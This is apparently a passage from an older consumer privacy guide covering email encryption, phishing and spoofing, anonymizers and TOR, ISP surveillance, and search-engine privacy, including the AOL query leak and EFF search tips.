Sending an email over the Internet is like sending a postcard through the mail. Anyone with the ability to intercept it can read it. There is evidence that the United States government either scans or compiles data about every email sent in the country.

You can keep the contents of your personal communications private by encrypting your email. This web page provides information and free downloads. It also lists programs that will encrypt your online interactive chat. This article illustrates how to set up secure email step by step. The trouble with encrypted email is that both the sender and the recipient must participate. It's impractical to send encrypted email to people you don't know, or to anyone using a different encryption system. The major email programs could easily support standardized, universally compatible encryption in their clients -- but don't.

Remember that emails are often the basis for phishing scams -- attempts to get you to reveal your personal information for nefarious purposes. Don't respond to email that may not be from a legitimate source. Don't even open it. Examples include claims you've won the lottery, pleas for help in handling large sums of money, sales pitches for outrageous deals, and the like.

Email may also be spoofed -- masquerading as from a legitimate source when it is not. Examples are emails that ask you to click on a link to update your credit card account or those that ask for account information or passwords.

Legitimate businesses are well aware of criminal misuse of email and don't conduct serious business transactions through mass emailings!

Many people use two email addresses to avoid spam and retain their privacy. They use one account as a "junk" email address for filling out web site forms, joining forums, and the like. This email address doesn't disclose the person's identity and it collects the spam. They reserve a second email account for personal communications. They never give this one out except to personal friends, so it remains spam-free.

3.4 Web Surfing Privacy

If you tested your computer as suggested earlier using ShieldsUp!, you saw that it gives out information to every web site you visit. This data includes your Internet protocol address, operating system, browser version, and more. Your Internet protocol address or IP address is a unique identifier assigned to your computer when you access the Internet. Web sites can use it to track you. Your Internet Service Provider or ISP assigns your computer its IP address using one of several different techniques. How traceable you are on the web varies according to the technique your ISP employs along with several other factors, such as whether you allow web sites to set cookies and whether your computer is compromised by malware.

One way to mask who you are when web surfing is to change your IP address. Anonymizing services hide your IP address and location from the web sites you visit by stripping it out as your data passes through them on the way to your destination web site. Anonymizers help hide your identity and prevent web sites from tracking you but they are not a perfect privacy solution (because the anonymizer itself could be compromised). Anonymizer.com is a very popular free anonymizing service. Find other free services here and here.

A more robust approach to anonymity is offered by free software from JAP and TOR. Both route your data through intermediary servers called proxies so that the destination web site can't identify you. Your data is encrypted in transit, so it cannot be intercepted or read by anyone who scans passing data. Services like JAP and TOR present two downsides. First, your data is sent through intermediary computers on the way to its destination, so response time slows. Whether you still find it acceptable depends on many factors; the best way to find out is simply to try the software for yourself.

These systems still leave you exposed to privacy violations by your Internet Service Provider. Your ISP is your computer's entry point into the Internet, so your ISP can track all your actions online. For this reason, when the Bush administration decided to monitor American citizens through the Internet, they proposed legislation that would force all ISPs to keep two years of data about all their customers' activities. The government's current web surveillance program made it necessary for a major ISP like AT&T/Yahoo to change its privacy policy in June 2006 to say that AT&T -- not its customers -- owns all the customers' Internet records and can use them however it likes. Repeated congressional proposals to immunize ISPs from all legal challenges only make sense if the ISPs colluded with the government in illegally monitoring Internet activities.

3.5 Search Privacy

Web sites that help you search the web are called search engines. Popular search engines like Google, Yahoo!, and MSN Search retain records of all your web searches. Individually, the keywords you type into search engines show little. But aggregated, they may expose your identity. They may also expose your innermost thoughts -- or be misinterpreted as doing so. Here's an example. Say the search engine captures you entering this list of searches --

  • kill wife
  • how to kill wife
  • killing with untraceable substance
  • kill with unknown substance

Someone might interpret these searches as indicating that you should be reported to the authorities because you're planning a murder. But what if you were simply doing research for that murder mystery you always wanted to write? You can see the need for search privacy. Do you have it? The federal government has demanded search records from major search engines like Google, AOL, Yahoo, and MSN.

While the government claims these requests are to combat sexual predators, most analysts believe they are for public surveillance and data mining. America Online (AOL) accidentally posted online 20 million personal queries from over 650,000 users. The data was immediately gobbled up and saved in other web servers. Although AOL apologized and quickly took down their posting, this data will probably remain available forever somewhere. Some people can be identified by their "anonymous" searches and have been harmed as a result of this violation of their privacy.

The AOL incident is a wake-up call to those who don't understand how small pieces of information about people can be collected by Internet servers, then compiled into revealing dossiers about our individual behaviors. This principle doesn't just apply to search engines. It extends to the web sites you visit, the books you buy online, the comments you enter into forums, the political web sites you read, and all your other web activities. The AOL debacle demonstrates that web activities many assume to be anonymous can sometimes be traceable to specific individuals.

The Electronic Frontier Foundation's excellent white paper Six Tips to Protect Your Search Privacy offers these recommendations to ensure your search privacy --

  • Don't include words in your searches that identify you personally (such as your name or social security number)
  • Don't use your ISP's search engine (since they know who you are)
  • Don't "log in" to search engine web sites
  • Don't let the search engine set cookies
  • Don't use the same IP address all the time
  • Use anonymizers like JAP or TOR to thwart traceability